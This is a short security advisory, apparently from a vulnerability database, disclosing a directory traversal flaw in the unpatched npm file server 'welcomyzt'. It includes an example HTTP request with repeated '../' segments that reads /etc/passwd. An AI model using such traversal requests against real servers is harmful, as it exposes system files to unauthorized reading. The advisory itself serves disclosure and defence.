Lucene search

K
nodejsLiang GongNODEJS:388
HistoryJun 29, 2017 - 5:55 p.m.

Directory Traversal

2017-06-2917:55:57
Liang Gong
www.npmjs.com
7

0.004 Low

EPSS

Percentile

74.9%

Overview

welcomyzt is a simple file server.

welcomyzt is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing “…/” in the url.

Example Request:

GET /../../../../../../../../../../etc/passwd HTTP/1.1
host: localhost

and server Response:

HTTP/1.1 200 OK
Date: Thu, 04 May 2017 23:59:18 GMT
Connection: keep-alive
Transfer-Encoding: chunked

{contents of /etc/passwd}

Recommendation

No patch is available for this vulnerability.

It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.

References

CPENameOperatorVersion
welcomyztge0.0.0

0.004 Low

EPSS

Percentile

74.9%